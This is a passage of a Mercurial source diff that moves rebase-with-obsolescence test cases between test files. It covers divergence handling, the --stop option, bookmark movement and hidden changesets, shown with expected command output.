7:3ffec603ab53 f (rewritten using rebase as 13:ef6251596616) | | | | x | 6:e36fae928aec e (rewritten using replace as 5:63324dc512ea) | | | - | | x 5:63324dc512ea e' (rewritten using rebase as 11:b6f172e64af9) + | | x 5:63324dc512ea e' (rewritten using rebase as 12:b6f172e64af9) | | | - | x | 4:76be324c128b d (rewritten using rebase as 13:a1707a5b7c2c) + | x | 4:76be324c128b d (rewritten using rebase as 11:a1707a5b7c2c) | |/ | x 3:a82ac2b38757 c (rewritten using rebase as 10:d008e6b4d3fd) | | @@ -1294,22 +268,63 @@ o 0:b173517d0057 a $ hg rebase -d 0 -r 2 - rebasing 2:a82ac2b38757 c "c" + note: not rebasing 2:a82ac2b38757 c "c", it has no successor $ hg log -G -r 'a': --hidden - o 5:69ad416a4a26 c + * 4:76be324c128b d | - | * 4:76be324c128b d + | x 3:ef8a456de8fa c1 (pruned) | | - | | x 3:ef8a456de8fa c1 (pruned) - | | | - | x | 2:a82ac2b38757 c (rewritten using replace as 3:ef8a456de8fa rewritten using rebase as 5:69ad416a4a26) - | |/ - | o 1:488e1b7e7341 b + x | 2:a82ac2b38757 c (rewritten using replace as 3:ef8a456de8fa) |/ + o 1:488e1b7e7341 b + | o 0:b173517d0057 a $ cd .. +Start a normal rebase. When it runs into conflicts, rewrite one of the +commits in the rebase set, causing divergence when the rebase continues. + + $ hg init $TESTTMP/new-divergence-after-conflict + $ cd $TESTTMP/new-divergence-after-conflict + $ hg debugdrawdag <<'EOS' + > C2 + > | C1 + > |/ + > B # B/D=B + > | D + > |/ + > A + > EOS + $ hg rebase -r B::C1 -d D + rebasing 1:2ec65233581b B "B" + merging D + warning: conflicts while merging D! 
(edit, then use 'hg resolve --mark') + unresolved conflicts (see 'hg resolve', then 'hg rebase --continue') + [240] + $ hg debugobsolete $(hg log -r C1 -T '{node}') $(hg log -r C2 -T '{node}') + 1 new obsolescence markers + obsoleted 1 changesets + $ hg log -G + o 4:fdb9df6b130c C2 + | + | x 3:7e5bfd3c08f0 C1 (rewritten as 4:fdb9df6b130c) + |/ + | @ 2:b18e25de2cf5 D + | | + % | 1:2ec65233581b B + |/ + o 0:426bada5c675 A + + $ echo resolved > D + $ hg resolve -m D + (no more unresolved files) + continue: hg rebase --continue + $ hg rebase -c + rebasing 1:2ec65233581b B "B" + note: not rebasing 3:7e5bfd3c08f0 C1 "C1" and its descendants as this would cause divergence + 1 new orphan changesets + Rebase merge where successor of one parent is equal to destination (issue5198) $ hg init p1-succ-is-dest @@ -1566,7 +581,7 @@ $ hg rebase -b 'desc("D")' -d 'desc("J")' abort: this rebase will cause divergences from: 112478962961 (to force the rebase please set experimental.evolution.allowdivergence=True) - [255] + [20] Rebase merge where both parents have successors in destination @@ -1585,7 +600,7 @@ note: not rebasing 5:b23a2cc00842 B "B", already in destination as 1:058c1e1fb10a D "D" rebasing 7:dac5d11c5a7d E tip "E" abort: rebasing 7:dac5d11c5a7d will include unwanted changes from 3:59c792af609c, 5:b23a2cc00842 or 2:ba2b7fa7166d, 4:a3d17304151f - [255] + [10] $ cd .. Rebase a non-clean merge. One parent has successor in destination, the other @@ -1652,489 +667,3 @@ Z $ cd .. 
- -Test that bookmark is moved and working dir is updated when all changesets have -equivalents in destination - $ hg init rbsrepo && cd rbsrepo - $ echo "[experimental]" > .hg/hgrc - $ echo "evolution=true" >> .hg/hgrc - $ echo "rebaseskipobsolete=on" >> .hg/hgrc - $ echo root > root && hg ci -Am root - adding root - $ echo a > a && hg ci -Am a - adding a - $ hg up 0 - 0 files updated, 0 files merged, 1 files removed, 0 files unresolved - $ echo b > b && hg ci -Am b - adding b - created new head - $ hg rebase -r 2 -d 1 - rebasing 2:1e9a3c00cbe9 tip "b" - $ hg log -r . # working dir is at rev 3 (successor of 2) - 3:be1832deae9a b (no-eol) - $ hg book -r 2 mybook --hidden # rev 2 has a bookmark on it now - bookmarking hidden changeset 1e9a3c00cbe9 - (hidden revision '1e9a3c00cbe9' was rewritten as: be1832deae9a) - $ hg up 2 && hg log -r . # working dir is at rev 2 again - 0 files updated, 0 files merged, 1 files removed, 0 files unresolved - 2:1e9a3c00cbe9 b (rewritten using rebase as 3:be1832deae9a) (no-eol) - $ hg rebase -r 2 -d 3 --config experimental.evolution.track-operation=1 - note: not rebasing 2:1e9a3c00cbe9 mybook "b", already in destination as 3:be1832deae9a tip "b" -Check that working directory and bookmark was updated to rev 3 although rev 2 -was skipped - $ hg log -r . 
- 3:be1832deae9a b (no-eol) - $ hg bookmarks - mybook 3:be1832deae9a - $ hg debugobsolete --rev tip - 1e9a3c00cbe90d236ac05ef61efcc5e40b7412bc be1832deae9ac531caa7438b8dcf6055a122cd8e 0 (Thu Jan 01 00:00:00 1970 +0000) {'ef1': '4', 'operation': 'rebase', 'user': 'test'} - -Obsoleted working parent and bookmark could be moved if an ancestor of working -parent gets moved: - - $ hg init $TESTTMP/ancestor-wd-move - $ cd $TESTTMP/ancestor-wd-move - $ hg debugdrawdag <<'EOS' - > E D1 # rebase: D1 -> D2 - > | | - > | C - > D2 | - > | B - > |/ - > A - > EOS - $ hg update D1 -q - $ hg bookmark book -i - $ hg rebase -r B+D1 -d E - rebasing 1:112478962961 B "B" - note: not rebasing 5:15ecf15e0114 book D1 tip "D1", already in destination as 2:0807738e0be9 D2 "D2" - 1 new orphan changesets - $ hg log -G -T '{desc} {bookmarks}' - @ B book - | - | x D1 - | | - o | E - | | - | * C - | | - o | D2 - | | - | x B - |/ - o A - -Rebasing a merge with one of its parent having a hidden successor - - $ hg init $TESTTMP/merge-p1-hidden-successor - $ cd $TESTTMP/merge-p1-hidden-successor - - $ hg debugdrawdag <<'EOS' - > E - > | - > B3 B2 # amend: B1 -> B2 -> B3 - > |/ # B2 is hidden - > | D - > | |\ - > | B1 C - > |/ - > A - > EOS - 1 new orphan changesets - - $ eval `hg tags -T '{tag}={node}\n'` - $ rm .hg/localtags - - $ hg rebase -r $D -d $E - rebasing 5:9e62094e4d94 "D" - - $ hg log -G - o 7:a699d059adcf D - |\ - | o 6:ecc93090a95c E - | | - | o 4:0dc878468a23 B3 - | | - o | 1:96cc3511f894 C - / - o 0:426bada5c675 A - -For some reasons (--hidden, rebaseskipobsolete=0, directaccess, etc.), -rebasestate may contain hidden hashes. "rebase --abort" should work regardless. 
- - $ hg init $TESTTMP/hidden-state1 - $ cd $TESTTMP/hidden-state1 - $ cat >> .hg/hgrc <<EOF - > [experimental] - > rebaseskipobsolete=0 - > EOF - - $ hg debugdrawdag <<'EOS' - > C - > | - > D B # prune: B, C - > |/ # B/D=B - > A - > EOS - - $ eval `hg tags -T '{tag}={node}\n'` - $ rm .hg/localtags - - $ hg update -q $C --hidden - updated to hidden changeset 7829726be4dc - (hidden revision '7829726be4dc' is pruned) - $ hg rebase -s $B -d $D - rebasing 1:2ec65233581b "B" - merging D - warning: conflicts while merging D! (edit, then use 'hg resolve --mark') - unresolved conflicts (see 'hg resolve', then 'hg rebase --continue') - [240] - - $ cp -R . $TESTTMP/hidden-state2 - - $ hg log -G - @ 2:b18e25de2cf5 D - | - | % 1:2ec65233581b B (pruned using prune) - |/ - o 0:426bada5c675 A - - $ hg summary - parent: 2:b18e25de2cf5 tip - D - branch: default - commit: 1 modified, 1 added, 1 unknown, 1 unresolved - update: 1 new changesets, 2 branch heads (merge) - phases: 3 draft - rebase: 0 rebased, 2 remaining (rebase --continue) - - $ hg rebase --abort - rebase aborted - -Also test --continue for the above case - - $ cd $TESTTMP/hidden-state2 - $ hg resolve -m - (no more unresolved files) - continue: hg rebase --continue - $ hg rebase --continue - rebasing 1:2ec65233581b "B" - rebasing 3:7829726be4dc tip "C" - $ hg log -G - @ 5:1964d5d5b547 C - | - o 4:68deb90c12a2 B - | - o 2:b18e25de2cf5 D - | - o 0:426bada5c675 A - -==================== -Test --stop option | -==================== - $ cd .. 
- $ hg init rbstop - $ cd rbstop - $ echo a>a - $ hg ci -Aqma - $ echo b>b - $ hg ci -Aqmb - $ echo c>c - $ hg ci -Aqmc - $ echo d>d - $ hg ci -Aqmd - $ hg up 0 -q - $ echo f>f - $ hg ci -Aqmf - $ echo D>d - $ hg ci -Aqm "conflict with d" - $ hg up 3 -q - $ hg log -G --template "{rev}:{short(node)} {person(author)}\n{firstline(desc)} {topic}\n\n" - o 5:00bfc9898aeb test - | conflict with d - | - o 4:dafd40200f93 test - | f - | - | @ 3:055a42cdd887 test - | | d - | | - | o 2:177f92b77385 test - | | c - | | - | o 1:d2ae7f538514 test - |/ b - | - o 0:cb9a9f314b8b test - a - - $ hg rebase -s 1 -d 5 - rebasing 1:d2ae7f538514 "b" - rebasing 2:177f92b77385 "c" - rebasing 3:055a42cdd887 "d" - merging d - warning: conflicts while merging d! (edit, then use 'hg resolve --mark') - unresolved conflicts (see 'hg resolve', then 'hg rebase --continue') - [240] - $ hg rebase --stop - 1 new orphan changesets - $ hg log -G --template "{rev}:{short(node)} {person(author)}\n{firstline(desc)} {topic}\n\n" - o 7:7fffad344617 test - | c - | - o 6:b15528633407 test - | b - | - o 5:00bfc9898aeb test - | conflict with d - | - o 4:dafd40200f93 test - | f - | - | @ 3:055a42cdd887 test - | | d - | | - | x 2:177f92b77385 test - | | c - | | - | x 1:d2ae7f538514 test - |/ b - | - o 0:cb9a9f314b8b test - a - -Test it aborts if unstable csets is not allowed: -=============================================== - $ cat >> $HGRCPATH << EOF - > [experimental] - > evolution.allowunstable=False - > EOF - - $ hg strip 6 --no-backup -q - $ hg log -G --template "{rev}:{short(node)} {person(author)}\n{firstline(desc)} {topic}\n\n" - o 5:00bfc9898aeb test - | conflict with d - | - o 4:dafd40200f93 test - | f - | - | @ 3:055a42cdd887 test - | | d - | | - | o 2:177f92b77385 test - | | c - | | - | o 1:d2ae7f538514 test - |/ b - | - o 0:cb9a9f314b8b test - a - - $ hg rebase -s 1 -d 5 - rebasing 1:d2ae7f538514 "b" - rebasing 2:177f92b77385 "c" - rebasing 3:055a42cdd887 "d" - merging d - warning: conflicts while 
merging d! (edit, then use 'hg resolve --mark') - unresolved conflicts (see 'hg resolve', then 'hg rebase --continue') - [240] - $ hg rebase --stop - abort: cannot remove original changesets with unrebased descendants - (either enable obsmarkers to allow unstable revisions or use --keep to keep original changesets) - [255] - $ hg rebase --abort - saved backup bundle to $TESTTMP/rbstop/.hg/strip-backup/b15528633407-6eb72b6f-backup.hg - rebase aborted - -Test --stop when --keep is passed: -================================== - $ hg rebase -s 1 -d 5 --keep - rebasing 1:d2ae7f538514 "b" - rebasing 2:177f92b77385 "c" - rebasing 3:055a42cdd887 "d" - merging d - warning: conflicts while merging d! (edit, then use 'hg resolve --mark') - unresolved conflicts (see 'hg resolve', then 'hg rebase --continue') - [240] - $ hg rebase --stop - $ hg log -G --template "{rev}:{short(node)} {person(author)}\n{firstline(desc)} {topic}\n\n" - o 7:7fffad344617 test - | c - | - o 6:b15528633407 test - | b - | - o 5:00bfc9898aeb test - | conflict with d - | - o 4:dafd40200f93 test - | f - | - | @ 3:055a42cdd887 test - | | d - | | - | o 2:177f92b77385 test - | | c - | | - | o 1:d2ae7f538514 test - |/ b - | - o 0:cb9a9f314b8b test - a - -Test --stop aborts when --collapse was passed: -============================================= - $ cat >> $HGRCPATH << EOF - > [experimental] - > evolution.allowunstable=True - > EOF - - $ hg strip 6 - saved backup bundle to $TESTTMP/rbstop/.hg/strip-backup/b15528633407-6eb72b6f-backup.hg - $ hg log -G --template "{rev}:{short(node)} {person(author)}\n{firstline(desc)} {topic}\n\n" - o 5:00bfc9898aeb test - | conflict with d - | - o 4:dafd40200f93 test - | f - | - | @ 3:055a42cdd887 test - | | d - | | - | o 2:177f92b77385 test - | | c - | | - | o 1:d2ae7f538514 test - |/ b - | - o 0:cb9a9f314b8b test - a - - $ hg rebase -s 1 -d 5 --collapse -m "collapsed b c d" - rebasing 1:d2ae7f538514 "b" - rebasing 2:177f92b77385 "c" - rebasing 3:055a42cdd887 "d" - merging d 
- warning: conflicts while merging d! (edit, then use 'hg resolve --mark') - unresolved conflicts (see 'hg resolve', then 'hg rebase --continue') - [240] - $ hg rebase --stop - abort: cannot stop in --collapse session - [255] - $ hg rebase --abort - rebase aborted - $ hg diff - $ hg log -G --template "{rev}:{short(node)} {person(author)}\n{firstline(desc)} {topic}\n\n" - o 5:00bfc9898aeb test - | conflict with d - | - o 4:dafd40200f93 test - | f - | - | @ 3:055a42cdd887 test - | | d - | | - | o 2:177f92b77385 test - | | c - | | - | o 1:d2ae7f538514 test - |/ b - | - o 0:cb9a9f314b8b test - a - -Test --stop raise errors with conflicting options: -================================================= - $ hg rebase -s 3 -d 5 - rebasing 3:055a42cdd887 "d" - merging d - warning: conflicts while merging d! (edit, then use 'hg resolve --mark') - unresolved conflicts (see 'hg resolve', then 'hg rebase --continue') - [240] - $ hg rebase --stop --dry-run - abort: cannot specify both --stop and --dry-run - [10] - - $ hg rebase -s 3 -d 5 - abort: rebase in progress - (use 'hg rebase --continue', 'hg rebase --abort', or 'hg rebase --stop') - [20] - $ hg rebase --stop --continue - abort: cannot specify both --stop and --continue - [10] - -Test --stop moves bookmarks of original revisions to new rebased nodes: -====================================================================== - $ cd .. 
- $ hg init repo - $ cd repo - - $ echo a > a - $ hg ci -Am A - adding a - - $ echo b > b - $ hg ci -Am B - adding b - $ hg book X - $ hg book Y - - $ echo c > c - $ hg ci -Am C - adding c - $ hg book Z - - $ echo d > d - $ hg ci -Am D - adding d - - $ hg up 0 -q - $ echo e > e - $ hg ci -Am E - adding e - created new head - - $ echo doubt > d - $ hg ci -Am "conflict with d" - adding d - - $ hg log -GT "{rev}: {node|short} '{desc}' bookmarks: {bookmarks}\n" - @ 5: 39adf30bc1be 'conflict with d' bookmarks: - | - o 4: 9c1e55f411b6 'E' bookmarks: - | - | o 3: 67a385d4e6f2 'D' bookmarks: Z - | | - | o 2: 49cb3485fa0c 'C' bookmarks: Y - | | - | o 1: 6c81ed0049f8 'B' bookmarks: X - |/ - o 0: 1994f17a630e 'A' bookmarks: - - $ hg rebase -s 1 -d 5 - rebasing 1:6c81ed0049f8 X "B" - rebasing 2:49cb3485fa0c Y "C" - rebasing 3:67a385d4e6f2 Z "D" - merging d - warning: conflicts while merging d! (edit, then use 'hg resolve --mark') - unresolved conflicts (see 'hg resolve', then 'hg rebase --continue') - [240] - $ hg rebase --stop - 1 new orphan changesets - $ hg log -GT "{rev}: {node|short} '{desc}' bookmarks: {bookmarks}\n" - o 7: 9c86c650b686 'C' bookmarks: Y - | - o 6: 9b87b54e5fd8 'B' bookmarks: X - | - @ 5: 39adf30bc1be 'conflict with d' bookmarks: - | - o 4: 9c1e55f411b6 'E' bookmarks: - | - | * 3: 67a385d4e6f2 'D' bookmarks: Z - | | - | x 2: 49cb3485fa0c 'C' bookmarks: - | | - | x 1: 6c81ed0049f8 'B' bookmarks: - |/ - o 0: 1994f17a630e 'A' bookmarks: - diff --git a/tests/test-rebase-obsolete.t b/tests/test-rebase-obsolete4.t copy from tests/test-rebase-obsolete.t copy to tests/test-rebase-obsolete4.t --- a/tests/test-rebase-obsolete.t +++ b/tests/test-rebase-obsolete4.t @@ -18,1647 +18,11 @@ > strip= > EOF -Setup rebase canonical repo - - $ hg init base - $ cd base - $ hg unbundle "$TESTDIR/bundles/rebase.hg" - adding changesets - adding manifests - adding file changes - added 8 changesets with 7 changes to 7 files (+2 heads) - new changesets cd010b8cd998:02de42196ebe (8 
drafts) - (run 'hg heads' to see heads, 'hg merge' to merge) - $ hg up tip - 3 files updated, 0 files merged, 0 files removed, 0 files unresolved - $ hg log -G - @ 7:02de42196ebe H - | - | o 6:eea13746799a G - |/| - o | 5:24b6387c8c8c F - | | - | o 4:9520eea781bc E - |/ - | o 3:32af7686d403 D - | | - | o 2:5fddd98957c8 C - | | - | o 1:42ccdea3bb16 B - |/ - o 0:cd010b8cd998 A - - $ cd .. - -simple rebase ---------------------------------- - - $ hg clone base simple - updating to branch default - 3 files updated, 0 files merged, 0 files removed, 0 files unresolved - $ cd simple - $ hg up 32af7686d403 - 3 files updated, 0 files merged, 2 files removed, 0 files unresolved - $ hg rebase -d eea13746799a - rebasing 1:42ccdea3bb16 "B" - rebasing 2:5fddd98957c8 "C" - rebasing 3:32af7686d403 "D" - $ hg log -G - @ 10:8eeb3c33ad33 D - | - o 9:2327fea05063 C - | - o 8:e4e5be0395b2 B - | - | o 7:02de42196ebe H - | | - o | 6:eea13746799a G - |\| - | o 5:24b6387c8c8c F - | | - o | 4:9520eea781bc E - |/ - o 0:cd010b8cd998 A - - $ hg log --hidden -G - @ 10:8eeb3c33ad33 D - | - o 9:2327fea05063 C - | - o 8:e4e5be0395b2 B - | - | o 7:02de42196ebe H - | | - o | 6:eea13746799a G - |\| - | o 5:24b6387c8c8c F - | | - o | 4:9520eea781bc E - |/ - | x 3:32af7686d403 D (rewritten using rebase as 10:8eeb3c33ad33) - | | - | x 2:5fddd98957c8 C (rewritten using rebase as 9:2327fea05063) - | | - | x 1:42ccdea3bb16 B (rewritten using rebase as 8:e4e5be0395b2) - |/ - o 0:cd010b8cd998 A - - $ hg debugobsolete - 42ccdea3bb16d28e1848c95fe2e44c000f3f21b1 e4e5be0395b2cbd471ed22a26b1b6a1a0658a794 0 (Thu Jan 01 00:00:00 1970 +0000) {'ef1': '4', 'operation': 'rebase', 'user': 'test'} - 5fddd98957c8a54a4d436dfe1da9d87f21a1b97b 2327fea05063f39961b14cb69435a9898dc9a245 0 (Thu Jan 01 00:00:00 1970 +0000) {'ef1': '4', 'operation': 'rebase', 'user': 'test'} - 32af7686d403cf45b5d95f2d70cebea587ac806a 8eeb3c33ad33d452c89e5dcf611c347f978fb42b 0 (Thu Jan 01 00:00:00 1970 +0000) {'ef1': '4', 'operation': 'rebase', 
'user': 'test'} - - - $ cd .. - -empty changeset ---------------------------------- - - $ hg clone base empty - updating to branch default - 3 files updated, 0 files merged, 0 files removed, 0 files unresolved - $ cd empty - $ hg up eea13746799a - 1 files updated, 0 files merged, 1 files removed, 0 files unresolved - -We make a copy of both the first changeset in the rebased and some other in the -set. - - $ hg graft 42ccdea3bb16 32af7686d403 - grafting 1:42ccdea3bb16 "B" - grafting 3:32af7686d403 "D" - $ hg rebase -s 42ccdea3bb16 -d . - rebasing 1:42ccdea3bb16 "B" - note: not rebasing 1:42ccdea3bb16 "B", its destination already has all its changes - rebasing 2:5fddd98957c8 "C" - rebasing 3:32af7686d403 "D" - note: not rebasing 3:32af7686d403 "D", its destination already has all its changes - $ hg log -G - o 10:5ae4c968c6ac C - | - @ 9:08483444fef9 D - | - o 8:8877864f1edb B - | - | o 7:02de42196ebe H - | | - o | 6:eea13746799a G - |\| - | o 5:24b6387c8c8c F - | | - o | 4:9520eea781bc E - |/ - o 0:cd010b8cd998 A - - $ hg log --hidden -G - o 10:5ae4c968c6ac C - | - @ 9:08483444fef9 D - | - o 8:8877864f1edb B - | - | o 7:02de42196ebe H - | | - o | 6:eea13746799a G - |\| - | o 5:24b6387c8c8c F - | | - o | 4:9520eea781bc E - |/ - | x 3:32af7686d403 D (pruned using rebase) - | | - | x 2:5fddd98957c8 C (rewritten using rebase as 10:5ae4c968c6ac) - | | - | x 1:42ccdea3bb16 B (pruned using rebase) - |/ - o 0:cd010b8cd998 A - - $ hg debugobsolete - 42ccdea3bb16d28e1848c95fe2e44c000f3f21b1 0 {cd010b8cd998f3981a5a8115f94f8da4ab506089} (Thu Jan 01 00:00:00 1970 +0000) {'ef1': '0', 'operation': 'rebase', 'user': 'test'} - 5fddd98957c8a54a4d436dfe1da9d87f21a1b97b 5ae4c968c6aca831df823664e706c9d4aa34473d 0 (Thu Jan 01 00:00:00 1970 +0000) {'ef1': '4', 'operation': 'rebase', 'user': 'test'} - 32af7686d403cf45b5d95f2d70cebea587ac806a 0 {5fddd98957c8a54a4d436dfe1da9d87f21a1b97b} (Thu Jan 01 00:00:00 1970 +0000) {'ef1': '0', 'operation': 'rebase', 'user': 'test'} - - -More complex 
case where part of the rebase set were already rebased - - $ hg rebase --rev 'desc(D)' --dest 'desc(H)' - rebasing 9:08483444fef9 "D" - 1 new orphan changesets - $ hg debugobsolete - 42ccdea3bb16d28e1848c95fe2e44c000f3f21b1 0 {cd010b8cd998f3981a5a8115f94f8da4ab506089} (Thu Jan 01 00:00:00 1970 +0000) {'ef1': '0', 'operation': 'rebase', 'user': 'test'} - 5fddd98957c8a54a4d436dfe1da9d87f21a1b97b 5ae4c968c6aca831df823664e706c9d4aa34473d 0 (Thu Jan 01 00:00:00 1970 +0000) {'ef1': '4', 'operation': 'rebase', 'user': 'test'} - 32af7686d403cf45b5d95f2d70cebea587ac806a 0 {5fddd98957c8a54a4d436dfe1da9d87f21a1b97b} (Thu Jan 01 00:00:00 1970 +0000) {'ef1': '0', 'operation': 'rebase', 'user': 'test'} - 08483444fef91d6224f6655ee586a65d263ad34c 4596109a6a4328c398bde3a4a3b6737cfade3003 0 (Thu Jan 01 00:00:00 1970 +0000) {'ef1': '4', 'operation': 'rebase', 'user': 'test'} - $ hg log -G - @ 11:4596109a6a43 D - | - | * 10:5ae4c968c6ac C - | | - | x 9:08483444fef9 D (rewritten using rebase as 11:4596109a6a43) - | | - | o 8:8877864f1edb B - | | - o | 7:02de42196ebe H - | | - | o 6:eea13746799a G - |/| - o | 5:24b6387c8c8c F - | | - | o 4:9520eea781bc E - |/ - o 0:cd010b8cd998 A - - $ hg rebase --source 'desc(B)' --dest 'tip' --config experimental.rebaseskipobsolete=True - rebasing 8:8877864f1edb "B" - note: not rebasing 9:08483444fef9 "D", already in destination as 11:4596109a6a43 tip "D" - rebasing 10:5ae4c968c6ac "C" - $ hg debugobsolete - 42ccdea3bb16d28e1848c95fe2e44c000f3f21b1 0 {cd010b8cd998f3981a5a8115f94f8da4ab506089} (Thu Jan 01 00:00:00 1970 +0000) {'ef1': '0', 'operation': 'rebase', 'user': 'test'} - 5fddd98957c8a54a4d436dfe1da9d87f21a1b97b 5ae4c968c6aca831df823664e706c9d4aa34473d 0 (Thu Jan 01 00:00:00 1970 +0000) {'ef1': '4', 'operation': 'rebase', 'user': 'test'} - 32af7686d403cf45b5d95f2d70cebea587ac806a 0 {5fddd98957c8a54a4d436dfe1da9d87f21a1b97b} (Thu Jan 01 00:00:00 1970 +0000) {'ef1': '0', 'operation': 'rebase', 'user': 'test'} - 
08483444fef91d6224f6655ee586a65d263ad34c 4596109a6a4328c398bde3a4a3b6737cfade3003 0 (Thu Jan 01 00:00:00 1970 +0000) {'ef1': '4', 'operation': 'rebase', 'user': 'test'} - 8877864f1edb05d0e07dc4ba77b67a80a7b86672 462a34d07e599b87ea08676a449373fe4e2e1347 0 (Thu Jan 01 00:00:00 1970 +0000) {'ef1': '4', 'operation': 'rebase', 'user': 'test'} - 5ae4c968c6aca831df823664e706c9d4aa34473d 98f6af4ee9539e14da4465128f894c274900b6e5 0 (Thu Jan 01 00:00:00 1970 +0000) {'ef1': '4', 'operation': 'rebase', 'user': 'test'} - $ hg log --rev 'contentdivergent()' - $ hg log -G - o 13:98f6af4ee953 C - | - o 12:462a34d07e59 B - | - @ 11:4596109a6a43 D - | - o 7:02de42196ebe H - | - | o 6:eea13746799a G - |/| - o | 5:24b6387c8c8c F - | | - | o 4:9520eea781bc E - |/ - o 0:cd010b8cd998 A - - $ hg log --style default --debug -r 4596109a6a4328c398bde3a4a3b6737cfade3003 - changeset: 11:4596109a6a4328c398bde3a4a3b6737cfade3003 - phase: draft - parent: 7:02de42196ebee42ef284b6780a87cdc96e8eaab6 - parent: -1:0000000000000000000000000000000000000000 - manifest: 11:a91006e3a02f1edf631f7018e6e5684cf27dd905 - user: Nicolas Dumazet <nicdumz.commits@gmail.com> - date: Sat Apr 30 15:24:48 2011 +0200 - files+: D - extra: branch=default - extra: rebase_source=08483444fef91d6224f6655ee586a65d263ad34c - extra: source=32af7686d403cf45b5d95f2d70cebea587ac806a - description: - D - - - $ hg up -qr 'desc(G)' - $ hg graft 4596109a6a4328c398bde3a4a3b6737cfade3003 - grafting 11:4596109a6a43 "D" - $ hg up -qr 'desc(E)' - $ hg rebase -s tip -d . 
- rebasing 14:9e36056a46e3 tip "D" - $ hg log --style default --debug -r tip - changeset: 15:627d4614809036ba22b9e7cb31638ddc06ab99ab - tag: tip - phase: draft - parent: 4:9520eea781bcca16c1e15acc0ba14335a0e8e5ba - parent: -1:0000000000000000000000000000000000000000 - manifest: 15:648e8ede73ae3e497d093d3a4c8fcc2daa864f42 - user: Nicolas Dumazet <nicdumz.commits@gmail.com> - date: Sat Apr 30 15:24:48 2011 +0200 - files+: D - extra: branch=default - extra: intermediate-source=4596109a6a4328c398bde3a4a3b6737cfade3003 - extra: rebase_source=9e36056a46e37c9776168c7375734eebc70e294f - extra: source=32af7686d403cf45b5d95f2d70cebea587ac806a - description: - D - - -Start rebase from a commit that is obsolete but not hidden only because it's -a working copy parent. We should be moved back to the starting commit as usual -even though it is hidden (until we're moved there). - - $ hg --hidden up -qr 'first(hidden())' - updated to hidden changeset 42ccdea3bb16 - (hidden revision '42ccdea3bb16' is pruned) - $ hg rebase --rev 13 --dest 15 - rebasing 13:98f6af4ee953 "C" - $ hg log -G - o 16:294a2b93eb4d C - | - o 15:627d46148090 D - | - | o 12:462a34d07e59 B - | | - | o 11:4596109a6a43 D - | | - | o 7:02de42196ebe H - | | - +---o 6:eea13746799a G - | |/ - | o 5:24b6387c8c8c F - | | - o | 4:9520eea781bc E - |/ - | @ 1:42ccdea3bb16 B (pruned using rebase) - |/ - o 0:cd010b8cd998 A - - - $ cd .. 
- -collapse rebase ---------------------------------- - - $ hg clone base collapse - updating to branch default - 3 files updated, 0 files merged, 0 files removed, 0 files unresolved - $ cd collapse - $ hg rebase -s 42ccdea3bb16 -d eea13746799a --collapse - rebasing 1:42ccdea3bb16 "B" - rebasing 2:5fddd98957c8 "C" - rebasing 3:32af7686d403 "D" - $ hg log -G - o 8:4dc2197e807b Collapsed revision - | - | @ 7:02de42196ebe H - | | - o | 6:eea13746799a G - |\| - | o 5:24b6387c8c8c F - | | - o | 4:9520eea781bc E - |/ - o 0:cd010b8cd998 A - - $ hg log --hidden -G - o 8:4dc2197e807b Collapsed revision - | - | @ 7:02de42196ebe H - | | - o | 6:eea13746799a G - |\| - | o 5:24b6387c8c8c F - | | - o | 4:9520eea781bc E - |/ - | x 3:32af7686d403 D (rewritten using rebase as 8:4dc2197e807b) - | | - | x 2:5fddd98957c8 C (rewritten using rebase as 8:4dc2197e807b) - | | - | x 1:42ccdea3bb16 B (rewritten using rebase as 8:4dc2197e807b) - |/ - o 0:cd010b8cd998 A - - $ hg id --debug -r tip - 4dc2197e807bae9817f09905b50ab288be2dbbcf tip - $ hg debugobsolete - 42ccdea3bb16d28e1848c95fe2e44c000f3f21b1 4dc2197e807bae9817f09905b50ab288be2dbbcf 0 (Thu Jan 01 00:00:00 1970 +0000) {'ef1': '13', 'fold-id': '6fb65cdc', 'fold-idx': '1', 'fold-size': '3', 'operation': 'rebase', 'user': 'test'} - 5fddd98957c8a54a4d436dfe1da9d87f21a1b97b 4dc2197e807bae9817f09905b50ab288be2dbbcf 0 (Thu Jan 01 00:00:00 1970 +0000) {'ef1': '13', 'fold-id': '6fb65cdc', 'fold-idx': '2', 'fold-size': '3', 'operation': 'rebase', 'user': 'test'} - 32af7686d403cf45b5d95f2d70cebea587ac806a 4dc2197e807bae9817f09905b50ab288be2dbbcf 0 (Thu Jan 01 00:00:00 1970 +0000) {'ef1': '13', 'fold-id': '6fb65cdc', 'fold-idx': '3', 'fold-size': '3', 'operation': 'rebase', 'user': 'test'} - - $ cd .. - -Rebase set has hidden descendants ---------------------------------- - -We rebase a changeset which has hidden descendants. Hidden changesets must not -be rebased. 
- - $ hg clone base hidden - updating to branch default - 3 files updated, 0 files merged, 0 files removed, 0 files unresolved - $ cd hidden - $ hg log -G - @ 7:02de42196ebe H - | - | o 6:eea13746799a G - |/| - o | 5:24b6387c8c8c F - | | - | o 4:9520eea781bc E - |/ - | o 3:32af7686d403 D - | | - | o 2:5fddd98957c8 C - | | - | o 1:42ccdea3bb16 B - |/ - o 0:cd010b8cd998 A - - $ hg rebase -s 5fddd98957c8 -d eea13746799a - rebasing 2:5fddd98957c8 "C" - rebasing 3:32af7686d403 "D" - $ hg log -G - o 9:cf44d2f5a9f4 D - | - o 8:e273c5e7d2d2 C - | - | @ 7:02de42196ebe H - | | - o | 6:eea13746799a G - |\| - | o 5:24b6387c8c8c F - | | - o | 4:9520eea781bc E - |/ - | o 1:42ccdea3bb16 B - |/ - o 0:cd010b8cd998 A - - $ hg rebase -s 42ccdea3bb16 -d 02de42196ebe - rebasing 1:42ccdea3bb16 "B" - $ hg log -G - o 10:7c6027df6a99 B - | - | o 9:cf44d2f5a9f4 D - | | - | o 8:e273c5e7d2d2 C - | | - @ | 7:02de42196ebe H - | | - | o 6:eea13746799a G - |/| - o | 5:24b6387c8c8c F - | | - | o 4:9520eea781bc E - |/ - o 0:cd010b8cd998 A - - $ hg log --hidden -G - o 10:7c6027df6a99 B - | - | o 9:cf44d2f5a9f4 D - | | - | o 8:e273c5e7d2d2 C - | | - @ | 7:02de42196ebe H - | | - | o 6:eea13746799a G - |/| - o | 5:24b6387c8c8c F - | | - | o 4:9520eea781bc E - |/ - | x 3:32af7686d403 D (rewritten using rebase as 9:cf44d2f5a9f4) - | | - | x 2:5fddd98957c8 C (rewritten using rebase as 8:e273c5e7d2d2) - | | - | x 1:42ccdea3bb16 B (rewritten using rebase as 10:7c6027df6a99) - |/ - o 0:cd010b8cd998 A - - $ hg debugobsolete - 5fddd98957c8a54a4d436dfe1da9d87f21a1b97b e273c5e7d2d29df783dce9f9eaa3ac4adc69c15d 0 (Thu Jan 01 00:00:00 